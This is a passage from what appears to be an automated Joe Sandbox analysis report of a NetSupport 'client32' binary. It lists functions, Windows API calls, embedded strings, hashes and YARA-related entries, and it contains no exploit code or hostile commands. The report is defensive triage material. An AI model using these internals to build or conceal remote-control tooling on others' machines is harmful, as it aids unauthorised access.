                                                                                                • Opcode ID: 77d297f33b5c506f22c3bf732d10ab4dc6308fb22cc3970cc09d48caafc54fbb
                                                                                                • Instruction ID: 0c96e9c5597ba62d4276379f6b127ad101ebe460f4b674406c6547f6066b8fe8
                                                                                                • Opcode Fuzzy Hash: 77d297f33b5c506f22c3bf732d10ab4dc6308fb22cc3970cc09d48caafc54fbb
                                                                                                • Instruction Fuzzy Hash: 01319EBAE00204ABDB40DFA4ED90D9E7778AF44358F008475FA18E7640F730EA46D7A0
                                                                                                Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 1105F251
                                                                                                • wsprintfA.USER32 ref: 1105F265
                                                                                                  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000), ref: 110ED59B
                                                                                                  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                                • wsprintfA.USER32 ref: 1105F5D6
                                                                                                  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                                • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                • API String ID: 273891520-33395967
                                                                                                • Opcode ID: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                                • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                                • Opcode Fuzzy Hash: fb8d40915478573fc0a9589c73963390b11639aa97460e6bf973478304e2651b
                                                                                                • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                                Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                • API String ID: 2111968516-2092292787
                                                                                                • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                                Function 69CF1380 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 294COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • _memset.LIBCMT ref: 69CF141D
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,69D20E3D,?,?,?,?,?,?,00000000), ref: 69CF1678
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,00000000), ref: 69CF16C8
                                                                                                • std::exception::exception.LIBCMT ref: 69CF1740
                                                                                                • __CxxThrowException@8.LIBCMT ref: 69CF175B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                • String ID: END_REC$MORE$RESULT$b
                                                                                                • API String ID: 285166177-3141901015
                                                                                                • Opcode ID: a4972ed96b02c625cdc9dae119f17adcbd009fbb07427316a9e46fb81f91d26a
                                                                                                • Instruction ID: b043ca4cd1de68deac6c2ef2611ab5b513053c4c5c2111a562d6c40f53d2247c
                                                                                                • Opcode Fuzzy Hash: a4972ed96b02c625cdc9dae119f17adcbd009fbb07427316a9e46fb81f91d26a
                                                                                                • Instruction Fuzzy Hash: 9FB16BF5C012599BDF50DFA4EC80AAEB7B4FF05308F40557AE50AA6640F7345B4ACB62
                                                                                                Function 69D0ABF1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getptd
                                                                                                • String ID: MOC$RCC$csm$csm
                                                                                                • API String ID: 3384420010-1441736206
                                                                                                • Opcode ID: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                • Instruction ID: 810de0c41e6901a488a868b9da3cb86bcc0b37e5ce2ab70a6d9f817ab63cfa95
                                                                                                • Opcode Fuzzy Hash: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
                                                                                                • Instruction Fuzzy Hash: 47319135500308CFCB20CF64C5A879D77F8BF50326F558979D85987A11E734D984CBA2
                                                                                                Function 69CEC390 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 69CEC3C8
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEC412
                                                                                                • _free.LIBCMT ref: 69CEC458
                                                                                                • _free.LIBCMT ref: 69CEC48C
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$MAX=%d$ORO=%s$ORU=%s
                                                                                                • API String ID: 3180605519-3721514808
                                                                                                • Opcode ID: c14fab5cc086ea6027940ae77e5d3d62b7c0d5a88f664f00b29a542212e501a4
                                                                                                • Instruction ID: f743af1b0c4992eeb1a09523669e732dd73d149343f09584914bc0169e148ee3
                                                                                                • Opcode Fuzzy Hash: c14fab5cc086ea6027940ae77e5d3d62b7c0d5a88f664f00b29a542212e501a4
                                                                                                • Instruction Fuzzy Hash: ED317EB95401087BEB02DF21EC80FBE775CAF05219F44D054F92A97A45F735EA1487B5
                                                                                                Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(986DAFD2,00000000,0000000A,?), ref: 110695BD
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3,000000FF), ref: 11069621
                                                                                                • wsprintfA.USER32 ref: 11069651
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                                Strings
                                                                                                • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                                • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                                • idata->n_connections=%d, xrefs: 1106964B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                                • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                                • API String ID: 2285713701-3017572385
                                                                                                • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                                • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                                • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                                Function 69CF9110 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 69CF9136
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 69CF913D
                                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 69CF9153
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 69CF9171
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 69CF917B
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 69CF918E
                                                                                                • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),69D2A2F0,00000004,?), ref: 69CF91AD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CF91D4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CF91DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                • API String ID: 2536908267-3889420803
                                                                                                • Opcode ID: 3da4357ccd313d3b60d9b02e896c6817451a70d7abdeebbae404fd3f67d56407
                                                                                                • Instruction ID: b321aa6da0e97921a4627b97f0ec49bacf07db25e7535cf51883e6fec612e5f0
                                                                                                • Opcode Fuzzy Hash: 3da4357ccd313d3b60d9b02e896c6817451a70d7abdeebbae404fd3f67d56407
                                                                                                • Instruction Fuzzy Hash: E3214F75A04245ABFF509FA5DE08F9A7BBCFF46754F008175EA04E3640FB70D9058A60
                                                                                                Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                • String ID:
                                                                                                • API String ID: 4121194973-0
                                                                                                • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                                • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                Function 69CF5DF0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 248COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 69CF5E36
                                                                                                  • Part of subcall function 69CF33A0: wsprintfA.USER32 ref: 69CF34FD
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf_memsetwsprintf
                                                                                                • String ID: %02X%02X%02X%02X%02X%02X$0x0x0x0$445817$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
                                                                                                • API String ID: 518437271-1007204944
                                                                                                • Opcode ID: df8ef4e113f082246d15b5e5056ef679ce30ad81bbfb265dda0cc32477e00100
                                                                                                • Instruction ID: fe913801b3a224c0328c4982dba2fffcb6863f08ce7ede6651cc1b9adab19c31
                                                                                                • Opcode Fuzzy Hash: df8ef4e113f082246d15b5e5056ef679ce30ad81bbfb265dda0cc32477e00100
                                                                                                • Instruction Fuzzy Hash: FD91B8B5C00258AEEB64DB64DC90FEEB778AF05314F4086EAE519B3180F7355A89CB74
                                                                                                Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                • API String ID: 3210887762-597690070
                                                                                                • Opcode ID: 1ff6cce5a3e98d59990bfc89cbde72bb65ec7281a2cbf4e7471b8b57d3eaa7bb
                                                                                                • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                                • Opcode Fuzzy Hash: 1ff6cce5a3e98d59990bfc89cbde72bb65ec7281a2cbf4e7471b8b57d3eaa7bb
                                                                                                • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                                Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(111EE294,986DAFD2,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 11053635
                                                                                                • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                                • GetTickCount.KERNEL32(?,00000000,11181BDE), ref: 11053660
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                Strings
                                                                                                Memory Dump Source
